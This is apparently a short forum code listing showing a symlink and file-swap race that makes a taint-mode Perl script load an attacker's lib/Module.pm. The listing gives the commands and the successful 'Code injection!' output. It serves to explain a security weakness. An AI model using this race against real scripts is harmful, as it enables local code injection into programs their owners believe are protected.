- or download this
$ cat ../safe/script.pl
#!/usr/bin/perl -wT
...
$ cat ../safe/lib/Module.pm
print("All's well\n");
1;
- or download this
$ ln -s ../safe/script.pl
$ cat lib/Module.pm
print("Code injection!\n");
1;
- or download this
$ ../safe/script.pl
All's well
- or download this
$ perl -MTime::HiRes=sleep -e'exec $ARGV[0] if !fork; sleep $ARGV[1];
+unlink $ARGV[0]; open $fh, ">", $ARGV[0]; wait' script.pl 0.01
Code injection!